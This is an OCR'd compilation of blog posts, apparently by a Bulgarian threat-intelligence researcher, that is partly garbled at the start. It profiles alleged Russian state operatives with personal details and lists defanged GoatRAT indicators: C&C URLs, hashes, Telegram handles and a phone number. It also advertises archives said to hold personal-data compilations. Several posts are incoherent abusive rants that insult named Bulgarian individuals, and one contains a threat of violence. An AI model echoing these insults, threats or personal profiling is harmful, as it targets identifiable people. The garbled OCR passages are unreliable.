Rf VrOBoBg62HX1q1VU3VptMsmXYBXD6TVkx_WBgvtizIVfxwPzwYy 


ul 
© 
ct 
ct 
‘oO 
n 
~ 
Ss 
o 
H 
fe) 
(ue) 
(ye) 
(0) 
Ri 
0a 
° 
fe) 
09 
ma 
(0) 
c 
n 
(0) 
8 
fa) 
eo} 
B 
ct 
(?) 
B 
ct 
Qa 
° 
5B 
™~ 
b 
=I 
(ec) 
~ 
oO 
~S 
72. https://intel471.com/blog/top-bulletproof-hosting-providers-yalishanda-ccweb-brazzzers-2021



2.1.2 Profiling Anatoliy Sergeyevich Kovalev from GRU’s Unit 74455 "NotPetya" Malware Gang (2024-01-07 01:37)


[1]


An image is worth a thousand words. And so is a [2]link including my research [3]here.


Related links: 
hxxp://vk.com/id702871912

Country of residence: Russia

City: Suzemka

Higher education:

University: BGU named after Petrovsky, 1989

Faculty: Faculty of Physics and Mathematics (Institute of Natural Sciences)

Secondary education:

School: School No. 2, 1984, Suzemka

Current activity: BGU named after Petrovsky


[8]


[9]


[10]


[11]


[12]

1. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEh1ig7cmI AX4VSqm9EEDOkSqK IxTezQALuT5FxeLTqHZBW7K
ulQMSn0qAWsVOafKAl4w4tb4FF27ZqsrCGeCDIbgV7_JOlrinsGLKV

2. https://rewardsforjustice.net/rewards/anatoliy-sergeyevich-kovalev/

3. https://ia804709.us.archive.org/27/items/dancho-danchev-whois-xml-api-maltego-bulletproof-infrastructure
-2/Exposing%20GRU%27s%20Unit%2074455%20_NotPetya_%20Malw

4. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgtmCMGOha1_oVhb7kS9GPsLrbBLOZKnMUEd5bkDRt8z5ceZ
iCmQ8u4VTxgkVF j GUKOSASSHbwR5puz6DXxa3IH5QBjLdbmbcZ0E3Q

5. https://blogger.googleusercontent.com/img/b/R29VZ2x1/AVvXsEgUJRNy8JgWf£mTFUhO8SQ6YvXmAZdJr IwCdY J7Zpjb4rxQ1P
bivWOm3U5IsOuv4g58C5-oxRHBalaBYHLbrVNf IIsciXZ4VhG1N1_p

6. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEgsEuSP7tHacghnruuCoGcZn78RY7HA_Qqn-zVyuKSJ86Ed0
IN1EglhkbF652vrQTh3ZL10CacpO0n3SscyoPOnI6czD4dnBdj-8Ira

7. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEiU3haTq01Y9W7U-L- v9QbBuleHIRk3hfny_3jad3G_zhSON
ceiQMGzLdUg5LmVe2Bhh0ic8XI4pPjV1_VPxBCTKIYMBsSQku3VGwc

8. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEiziZjqb- IFW5yU8YDYohxnYSvDhSf SWOaQKWsvFQJtR4Pd8
7WHECKZOjmT_rM- ez1KFEnXWHQXNDZ_PojbZ3DiTTL3dwfsywIp5ev

9. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEg-ntH1UbybB4ILZrg5emEnmbH9CgnZ- 9cUt jpgs_z4j gmwH
_UAtzcKWLQLJso2HQE67xyKzeylvkzFK2FxVK0ajB2Yj551M-gpAR5

10. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEhZdCAyDknZdS5xWS_c_8D-AtD_8sI8vG1Fq7_7m59W4K5
oGRgKlygJ2MtM181M_19sMu_24w2nBt1kCOwItiYtvDuRUJArzZO0d8rx

11. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEhkvapZTWvXXiToKB2u4AkxxrnlugiEcitPQRFXmbG6Nq_
B4Nf iytvP4jCxqE40JqKb7£ IsXMOHfFX1k016v5eUxgvAMmHUUjW94Eq

12. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEh8BRMsXQzRr68DFnZ8gcf4Y17pc j8sqbD7FqheEhmnD-c
BAZDvV9EyR86D1XM3I sbdBe9VP703x_GO6yDO3AF3PM_xTukWxUztcS


2.1.3 Where Is Anton Nikolaevich Korotchenko (Антон Николаевич Коротченко)
Also Known as Koobface Botnet Master KrotReal? - Part Three (2024-01-07 10:05)


[1] 


An image is worth a thousand words. And so is a [2]link and my analysis on the Koobface 
botnet [3]here. 
2.1.4 The Deepest Gipsy King of Them All? - Yavor Kolev - A Dipshit Courtesy of
Republic of Bulgaria on the "International" - "I Have Never Left the Country"
Law Enforcement "Scene" (2024-01-10 04:35)


[1]


Can you recognize apologies spot a dipshit when you see one? Can the recognize the degradation
between his teeth or what would some other dipshits courtesy of him that don’t exist
would consider something that doesn’t exist to begin with the very presence of a human being
his teeth and relevant face sculpture to begin with?


This is not poetry. This is the deepest ugliest and most disgusting presence that I would stay a
million miles away to skip his relevance of existence to begin with.


There’s a saying. The ones who are disgusting are disgusting at all. Beware and don’t even
bother the elaboration on this. Watch out for the irrelevance of these people and try to avoid 
them to the bottom of your brains out and there’s not such word as out. The dipshitness of 
your overall irrelevance is bothering other to be bottom of their irrelevance. The result? You 
don’t exist. At all. 


If you can spit it try to vomit it but vomit the bottom of your brain’s and idiocity’s irrelevance 
to the bottom of your brain’s out. We will find and beat the bottom of your irrelevance out to 
the bottom of your irrelevance out. You’re a disgusting presentation of people who dipshit on 
each other and then skip the breakfast. And guess what? The dinner. 


Stay tuned. But you don’t. 


2.1.6 Profiling Internet Research Agency’s Anna Vladislavovna Bogacheva
(2024-01-12 22:08)


[1] 




An image is worth a thousand words. Here’s the [2]link. 
[3]


1. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEj3YGUsAy0vyG6SzbTz53zhasCnLdBPSov6z2ywYDSgBKN1-
Z9358VR90al 9MTTq8vW_A1lb1KsOXvmihzZVVGgDBI1qz043H4ZK1
2. https://www.fbi.gov/wanted/counterintelligence/anna-vladislavovna-bogacheva
3. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEirxwytZjRKXTOZx3uAeUr J£U98LFaq6vHgLfG1iCs6koRe
JosVdTb6m2QReqORMy IPnswm6eHQ1xNzio8MctceERJE2KpnRZ9Zff


2.1.7. Who’s Behind GoatRAT? (2024-01-13 23:01) 


[Image: login panel with the fields "Usuário" (user) and "Senha" (password) and an "ACESSAR" (log in) button]


In this brief analysis I’ll take a look at who’s behind GoatRAT in terms of social media activity,
C&C servers and actual personally identifiable information.


Personally identifiable information: 
hxxp://bit[.]ly/nubankmodulo 
hxxp://goatrat[.]com/apks/apk20[.]apk 
Sample MD5s:
6583a9b6b83738e0bf2a261fc04483e18772da3241e467fdef37a8e27b1869a7 
9a8e85cflbbd32c71f0efa42ffedfla0 
hxxp://api[.]goatrat[.]com:3008 

Social Media: 

hxxp://t[.]me/sickoDevz 
hxxp://t[.]me/goatmalware

Web site:

hxxp://criminalmw[.]fun
hxxp://clientes[.]criminalmw[.]fun 
WhatsApp - +5511987457894 
ba5833b49e2c6501f5bbce90b7948a85 
Code Signing Certificate Signed By: Mr[.] Paxton Doyle PhD 
SSL: 94ba7810ecelalb227e6a5b509c8bb228e7285ala5cee5f0ee26542783d4b09a 
Sample C&C servers:

Sample C&C servers:



Sample Photos: 


[Image: team slide reading "Sem eles, nada disso seria possível" ("Without them, none of this would be possible"), showing sickoDevz (CEO & Developer), Pereira (Administrador) and Flyn (Administrador)]


[3]


[Image: feature slide "Tela Falsa" (Fake Screen): the bot inserts a fake screen of the bank itself so that the victim does not see the bot operating and does not suspect anything at all]


[4]


[Image: feature slide "Device Logs": see bank balances and the whole process of the bot using the Device Logs mechanism]


[5]


[Image: slide "Por Que Escolher A Criminal?" (Why choose Criminal?): "We at the Criminal team work day and night to add new functions weekly and new banks/mechanisms to make your work even better"]


[Image: feature slide "ATS": transfers the entire balance of the person's account in seconds just by making them open their own bank]


[Image: CriminalMW promotional banner]


1. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEiAUSIRxNbL3Zsd1f YZ10-uM5C4uxZLrGegZ55Ins JRvIMOq
9nnK9_LPqHLibdMiIHXTjYRDI5s_dKKOqGxNLjQMpPKOh3U1NpMXx2Q
2. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEh1Bxlp2efLOUA7_JvpROaaNIyRV7QIB50xsa4YgimKk7_g4z
G1VeLScL1JMkqwIYmvEzz2nLMT jn6KiatL_H8NEQkj1zirz71Qq-
3. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEg7Lh3B1zd JQKkbMVvFx1GD59x1uCWVsa67 bdV6SA6Hmf6FD
4. https://blogger.googleusercontent.com/img/b/R29vZ2x1/AVvXsEg7axt9T9ODPVYG2UxKz03m j TwuirqvRpCBNeXB93UV20FCT
5. https://blogger.googleusercontent.com/img/b/R29v22x1/AVvXsEjGX7pyyqzck_o1Bdy71sn6ZcUUE4F2TciXEjMzT JOHVIX15


2.1.8 Who Can Improve My Wikipedia Article? (2024-01-15 20:12) 


Who can assist and improve my [1]Wikipedia article? 


Thank you. 


[2] 




1. https://en.wikipedia.org/wiki/Draft:Dancho_Danche


2. https://blogger.googleusercontent.com/img/a/AVvXsEi02Z-aeWX4D3t YDEatdFSOwP4oT JB9wNVOM-OnyOmKHJ79Pr9IDXybdA
DOM-4FsclMmPaepoeFbJ_MsitPsx1Ua15zVJ9wKcLodgQ1xIAtQBi


2.1.9 Retiring (2024-01-16 18:37) 


[1] 
[Image: "Memorabilia" banner, by Dancho Danchev, https://ddanchev.blogspot.com, Email: dancho.danchev@hush.com]


I’m retiring. Ebay memorabilia auction soon with some surprises. I'll post a link here. All of my 
research 2005-2023 here - [2]https://archive.org/details/@ddanchev Yours sincerely. Dancho 


[3] 


[4] 


Dancho Danchev
From Wikipedia, the free encyclopedia


Citizenship: Bulgarian
Occupation: Security researcher
Website: Dancho Danchev's blog

Contents
1 Career
2 Koobface investigations
3 2010 Disappearance
4 References
5 External links


Career


Danchev is known for discovering computer virus and spamming attacks as they surface on the Internet, and
providing details on the new threats. As a security researcher, he has been the first person to report major
malware campaigns as they begin to take form. Danchev has also discussed the use of new technology, like
USB keys, and their potential effects on the internal security of the computer systems of major corporations,
[...] breaking through Internet security protocols as well.


His blog posts and articles have included explanations of the overall landscape of the underground malware
industry in countries like Russia and China, in addition to the use of the internet by terrorist networks.
The entities he has reported on include volunteer militias of hackers that independently attack the servers of
enemy nations while their countries are in the midst of military operations, such as Russia's involvement in
Georgia. In 2009 he discovered that the Indian embassy in Spain had been taken over to serve malware to
those who visited the site. He also reports on the hacking of major corporate websites.

Specific attacks that Danchev provided initial analysis for include a “Chinese hacktivist” attack on CNN.com in
2008; the Operation Ababil attack on Wells Fargo, U.S. Bank and PNC Bank; a 2009 malicious comment
attack on YouTube and Digg.com; a large 2010 blackhat SEO campaign affecting both Bing and Google
searches; a 2009 New York Times malvertisement attack; and a 2010 attack on Network Solutions.


Koobface investigations


In February 2010 Danchev posted an article called “10 things you didn’t know about the Koobface gang”,
discussing various interactions he has had with them (they once redirected the Facebook website to his blog) and
other pieces of information. In May the creators of the malware then forced its network to post a point by point
response to the article on the screens of all the computers they had infected. Danchev continued his
investigations into the gang, eventually posting the full biographical details of some of its members on his
blog.


2010 Disappearance


In late 2010 ZDNet, which Danchev co-wrote, reported that he had disappeared from home in Bulgaria and was
feared harmed. On September 11, 2010 he submitted what would be his final post of the year, writing about
a “cyber jihad” and during that month he also sent letters to friends stating that he was concerned that he was
under surveillance. After his disappearance ZDNet received a message stating that "Dancho's alive but he's

[5] 


Dancho, HBGary is interested in talking w/ you about Threat
Intelligence


From: greg@hbgary.com

To: dancho.danchev@gmail.com

Date: 2009-04-15 13:02

Subject: Dancho, HBGary is interested in talking w/ you about Threat Intelligence


Dancho,


My company, HBGary, is developing a new business unit which we call “Global
Services”. A keystone of the offering is tracking human and organizational
factors behind malware threats. Your work, and some of the work of your
peers, seems to be very good analysis in this area. Since the space is new
to us, I want to tap the best minds in the industry to help us develop an
offering. Would you be interested in spending some time with our team to
discuss your work and methodology? On the market side I am also trying to
pin down what customers will actually pay for, and perhaps you have some
insight here as well. I am willing to hire you as a consultant, and/or pay
for your time and travel in any way that works for you. I will be at RSA
next week, and our company has an event for customers in San Jose in the
first or second week of May. I also travel to Washington DC quite a lot.


[6] 
2. https://archive.org/details/@ddanchev
2.1.10 Auction Onion (2024-01-18 14:25)


Dancho Danchev's Dark Web Onion 1.5TB OSINT/Cybercrime Research and Threat 
Intelligence Gathering Personal Memorabilia Files 2010-2023 Private Torrent Dark Web 
Auction 


https://ddanchev.blogspot.com 
Email: dancho.danchev@hush.com 
Wire Bank Transfer Details for This Dark Web Auction Available On Request Using Email 


Auction Bids For My Private Personal Files 2010-2023 Memorabilia Torrent [1.5TB] 
[ZIP] Start At $85,000 


Full Directory Listing in HTML Available As A Teaser Using Email 


Dear Dark Web Onion visitor, 


This is Dancho Danchev (https://ddanchev.blogspot.com) and I’m proud to welcome you to my Dark Web Onion
Auction Web site.


Keywords: Dark Web, Dark Web Onion, Hacking, Hacker, Hackers, Dancho Danchev, Intelligence, Intelligence
Studies, Intelligence Community, NSA, GCHQ, Cyber Intelligence, Malicious Software, Malware, Cyber
Surveillance, Eavesdropping, Wiretapping, Top Secret, Classified, Top Secret Program, Classified Program,
Cybercrime, Data Mining, Big Data, Cybercrime Research, Threat Intelligence, Security Industry, Information
Security, Information Security Industry, Computer Security, Computer Hacking, Network Security, Network
Hacking, OSINT, Russia, Iran, Russian Hackers, Iranian Hackers, Russian Cybercriminal, Cybercrime Forum,
Cybercrime Forum Community, Astalavista, Astalavista.box.sk, Box.sk, Box.sk Network, Cracks, Serials,
Keygens, Key Generators, Hacker Search Engine, Cracks Search Engine, Serials Search Engine, Threat
Intelligence, Cybercrime Research, Malware, Malicious Software, Botnet, Botnets, Reverse Engineering, Kali
Linux, Metasploit, CVE, Bluetooth, RFID, Wireless, Tools, Bruteforce, Social Engineering, XSS, SQL Injection,
Secure Coding, Exploit, Vulnerability, Bug Bounty, Exploit Kit, Zero Day, Patch Tuesday, Fuzzing, Framework,
Remote Code Execution, SOCMINT, Dark Web, Deep Web, Metadata, EXIF, OPSEC, Maltego, Palantir, SIEM,
Indicator of Compromise, Advanced Persistent Threat, TTP, Malware Tracker, Malware Blocklist, Threat
Intelligence Feed, Threat Intelligence API, MISP, STIX, Command and Control, Malware Feed, OpenCTI,
Malware Sandbox, Javascript Obfuscation, Reverse Engineering, Honeypot, MD5, Malware Sample, Passive DNS,
Domainkeys, IP Reputation, Blacklist, Spam Filtering, Spam Solution, Spam Feed, Bayesian Filter, Heuristic
Filter, Temporary Email, Blackhat SEO, Phishing Framework, Phishing Template, SPF, Spear Phishing, Phishing
Report, Security Training, Typosquatting, Domain Reputation, Phishing Kit, P2P Botnet, Botnet Shutdown,
Botnet Sinkhole, IRC Botnet, ASN Monitoring, Linux Malware, Botnet Mitigation, Spam Botnet, DDoS Botnet,
Botnet Tracker, VPN, SSL Encryption, Full Disk Encryption, End-to-End Encryption, Cookie Tracking, Do Not
Track, Tor Network, NSA, GCHQ, Browser Fingerprint, PGP, OTR, OMEMO, SSL, DNSSEC, IPSec, Encrypted Email,
Encryption Tool, Zero Knowledge Backup, Ethernet Encryption, APT, Money Mule, Re-Shipping Fraud, Credit Card
Fraud, Hacker Group, Web Site Defacement, Mobile Botnet, IoT Botnet, Router Botnet, 2FA, Cryptohippie, Exit
Node, OpenVPN, Wireguard, VPN Jurisdiction, VPN No Logs, VPN Router, Free VPN, VPN Trial, VPN Technology


[2]Dark Web Onion. 


1. https://blogger.googleusercontent.com/img/a/AVVXsEi0QwGUTiBcAfWdgc_Fxidmq9xkLbvTIPoLCwQr9EeWN6SslktwheNnc
6EKEO45 j JZpmC IW] C2ADMAiA8vGOCQs1C8laNf9Bg4xP8H5dsFooah
2. http://cnaomocftxw3wh7gyyct5kpf3rctteornc7uup7ak4oiyy35ypvd31id.onion/


2.1.11 Research Compilation 2005-2023 - Torrent (2024-01-20 00:47) 


[1] 
Cybercrime_Forum_Data_Set_2021.rar
Dancho_Danchev_Astalavista_Security_Newsle...
Dancho_Danchev_Blog_Archive_JSON_2021.rar
Dancho_Danchev_Blog_E-Book_Archive_2021....
Dancho_Danchev_Cyber_Threat_Actors_Analy...
Dancho_Danchev_Cybercrime_Research_2021...
Dancho_Danchev_Cybercrime_Research_Prese...
Dancho_Danchev_Intelligence_Community_2....
Dancho_Danchev_Interview_DW_Koobface_Bo...
Dancho_Danchev_Iran_Hackers_Personally_Ide...
Dancho_Danchev_Iran_White_Paper_2021.rar
Dancho_Danchev_Iran_White_Paper_Part_Two...
Dancho_Danchev_Keynote_Koobface_Botnet....
Dancho_Danchev_Malware_Trends_White_Pap...
Dancho_Danchev_Medium_Research_Compila...
Dancho_Danchev_Personal_Memoir_Compilat...
Dancho_Danchev_Private_Party_New_Year_Vid...
Dancho_Danchev_Security_Policy_White_Pape...
Dancho_Danchev_Twitter_Account_Archive_2...
Dancho_Danchev_Unit-123_Security_Research...
Dancho_Danchev_Webroot_Research_Compil...
Dancho_Danchev_ZDNet_Research_Compilati...
WhoisXML_API_Research_Articles_2021.rar


UPDATE: 


[2]New link.
[3]


Size column: 39.4 GB, 288 MB, 4.15 MB, 6.06 GB, 9.24 MB, 754 kB, 10.9 MB, 1008 MB, 2.65 MB, 3.04 GB, 255 MB,
9.99 MB, 163 MB, 2.41 MB, 60.7 MB, 164 MB, 541 MB, 2.41 MB, 27.4 MB, 602 MB, 464 MB, 48.6 MB

Status column: Seeding (every entry)


Cybercrime_Forum_Data_Set_2021 61,120,172,747
Dancho_Danchev_Blog_E-Book_Archive_2021 6,512,017,221
Dancho_Danchev_Iran_Hackers_Personally_Identifiable_Information_Compilation_2021 3,271,685,164
Dancho_Danchev_Cybercrime_Personal_Photos_Ecosystem_2021_Compilation 1,655,693,139
Dancho_Danchev_Intelligence_Community_2.0_Dark_Web_Onion_Backup_2021 911,383,016
Dancho_Danchev_ZDNet_Research_Compilation_2021 692,896,821
Dancho_Danchev_Webroot_Research_Compilation_2021 692,896,821
Dancho_Danchev_Private_Party_New_Year_Videos_Compilation 659,396,866
Dancho_Danchev_Iran_White_Paper_Part_Two_2021 348,769,928
Dancho_Danchev_Astalavista_Security_Newsletter_Compilation_2021 348,769,928
Dancho_Danchev_Iran_White_Paper_2021 268,079,837
Dancho_Danchev_Personal_Memoir_Compilation_Research_2021 186,005,904
Dancho_Danchev_Keynote_Koobface_Botnet_CyberCamp_2021 176,572,076
Dancho_Danchev_Medium_Research_Compilation_2021 69,817,301
WhoisXML_API_Research_Articles_2021 56,543,476
Dancho_Danchev_Unit-123_Security_Research_Compilation_2021 31,856,017
Dancho_Danchev_Cybercrime_Research_Presentations_2021 12,329,249
Dancho_Danchev_Cyber_Threat_Actors_Analysis_Research_Compilation_2021 10,129,788
Dancho_Danchev_Security_Policy_White_Paper_2021 5,057,044
Dancho_Danchev_Malware_Trends_White_Paper_2021 5,057,044
Dancho_Danchev_Interview_DW_Koobface_Botnet_MP3_2021 2,838,160
Dancho_Danchev_Cybercrime_Research_2021_Personally_Identifiable_Information_Compilation 2,409,268
Dancho_Danchev_Twitter_Account_Archive_2021 884,810


1. https://blogger.googleusercontent.com/img/b/R29VZ2x1/AVvXsEhbty yHD-wb5Vv4xbULUHGTaQwWYd-vBDs57ygQLC4NjDRf
1c8xMTIZEjxfUnxX0Um1fbCyucApV9J9HIisBU7v jhBw-Md9Q5IQaz
2. https://drive.google.com/file/d/1bmwTz0tVb2Vxqp5Wc7xSy_UFnmxmJW4Y/view?usp=sharing
3.


2.1.12 Cybercrime Forum Data Set - 2024 - Torrent (2024-01-20 11:09) 


[1] 

Archive_01 10/21/2022 4:20 PM WinRAR archive 95,241 KB
Archive_02 10/21/2022 5:38 PM WinRAR archive 392,519 KB
Archive_03 10/21/2022 4:38 PM WinRAR archive 159,028 KB
Archive_04 10/21/2022 3:54 PM WinRAR archive 12,161 KB
Archive_05 10/21/2022 5:55 PM WinRAR archive 338,750 KB
Archive_06 10/22/2022 7:43 AM WinRAR archive 129,025 KB
Archive_07 10/21/2022 5:04 PM WinRAR archive 562,089 KB
Archive_08 10/21/2022 2:42 PM WinRAR archive 691,458 KB
Archive_09 10/21/2022 5:03 PM WinRAR archive 248,050 KB
Archive_10 3/7/2022 7:13 AM WinRAR ZIP archive 721,586 KB
Archive_11 6/23/2022 6:22 AM WinRAR ZIP archive 271,104 KB
Archive_12 6/23/2022 6:22 AM WinRAR ZIP archive 268,032 KB

UPDATE: 

[2]New link. 
[3]

Cybercrime_Forum_Data_Set_2024_01 1/19/2024 2:54 AM WinRAR archive
Misc_01 12/22/2023 3:48 PM WinRAR ZIP archive
Misc_01 10/21/2022 5:04 PM WinRAR archive
Misc_03 9/7/2023 12:51 PM WinRAR ZIP archive
Misc_04 9/7/2023 1:06 PM WinRAR ZIP archive
Archive_01 10/21/2022 4:20 PM WinRAR archive


[4]

Misc_01 10/22/2022 7:50 AM WinRAR archive
Archive_10 3/7/2022 7:13 AM WinRAR ZIP archive
Archive_08 10/21/2022 2:42 PM WinRAR archive
Archive_07 10/21/2022 5:04 PM WinRAR archive
Archive_02 10/21/2022 5:38 PM WinRAR archive
Archive_05 10/21/2022 5:55 PM WinRAR archive
Archive_11 6/23/2022 6:22 AM WinRAR ZIP archive
Archive_12 6/23/2022 6:22 AM WinRAR ZIP archive
Archive_09 10/21/2022 5:03 PM WinRAR archive
Archive_03 10/21/2022 4:38 PM WinRAR archive
Archive_06 10/22/2022 7:43 AM WinRAR archive
Archive_01 10/21/2022 4:20 PM WinRAR archive
Archive_04 10/21/2022 3:54 PM WinRAR archive


[5]

Cybercrime_Forum_Data_Set_Archive_2022 10/17/2022 5:34 AM WinRAR archive
Cybercrime_Forum_Data_Set_2021 6/22/2022 6:27 AM WinRAR archive
Cybercrime_Forum_Data_Set_Archive_2019 10/16/2019 5:06 PM WinRAR ZIP archive
Misc_01 9/7/2023 8:41 AM WinRAR ZIP archive
Cybercrime_Forum_Data_Set_Archive_2021 5/18/2021 2:47 PM WinRAR archive
Cybercrime_Forums_Compilation_2021_08 12/25/2021 9:18 AM WinRAR archive
Cybercrime_Forums_Compilation_2021_08_01
Cybercrime_Forums_Compilation_2021_10
Cybercrime_Forums_Compilation_2021_09
Cybercrime_Forums_Compilation_2021_09_01
Cybercrime_Forums_Compilation_2021_08_02
Cybercrime_Forums_Compilation_2021_05
2.2.1 A Case Study on a Bulgarian Dipshit Local Drug Addict Gang Member and A
Peasant From Troyan, Bulgaria Part of The Gang that Robbed and Kidnapped 
and Home Molested Me (2024-02-11 10:48) 
When you're so dumb that even the "drugs" can’t "catch you". The next thing that follows is
the laughing. 
2.2.2 Petar Shoshkov - Exposing a Bulgarian Troyan City Based Bottom Sucking Gang
Member That Robbed Home Molested and Kidnapped Me (2024-02-11 10:48) 
Is it the "lack" of or the lack of?
2.2.3 The Ugliest Bulgarian Wannabe Law Enforcement Officer Real Life "Cop" In the
Bulgarian "System" (2024-02-11 10:48) 
Can you suck my bottom? Do you have the permission of other people to do it before you suck
mine? Do you know what does this constitutes? Let’s play a game. If my bottom is in the 
ugliest and most disgusting part of the universe and you want to suck it does this mean that 
you're there too? You don’t exist. 


We in the face of your parents should rather pay you to best yourself and stop existing and 
make a free low profile non-existent and cheap movie out of it which is something that you 
shouldn’t forget doesn’t constitute anything. It’s the very art of having you beat yourself 
courtesy of your parent’s money and having the very same non-existent Bulgarian dipshits 
pay you to beat yourself. While beating yourself you can easily forget about compilations 
and series of movies about your beating simply because your very ugliness and disgusting 
existence doesn’t compare to that of a human being. 